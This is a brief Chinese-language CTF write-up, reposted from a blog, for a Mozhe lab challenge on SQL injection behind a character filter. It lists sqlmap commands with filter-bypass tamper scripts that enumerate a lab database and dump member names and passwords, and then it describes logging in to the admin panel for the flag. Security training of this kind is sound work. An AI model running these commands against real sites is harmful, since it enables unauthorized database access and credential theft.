SQL过滤字符后手工注入漏洞测试(第1题)
?
https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe
?
分析題目,屬于時間盲注,這種情況,通常使用sqlmap 直接注入就行了,手動語法太復雜了!!!
?
sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment --current-db
╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup --tables
?
╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member --columns
╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member -C name,password,status --dump
?
?登錄后臺,獲取flag,提交即可
?
轉載于:https://www.cnblogs.com/hack404/p/10755300.html
總結
以上是生活随笔為你收集整理的SQL过滤字符后手工注入漏洞测试(第1题)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: WPF编程,将控件所呈现的内容保存成图像
- 下一篇: mongodb查询分页优化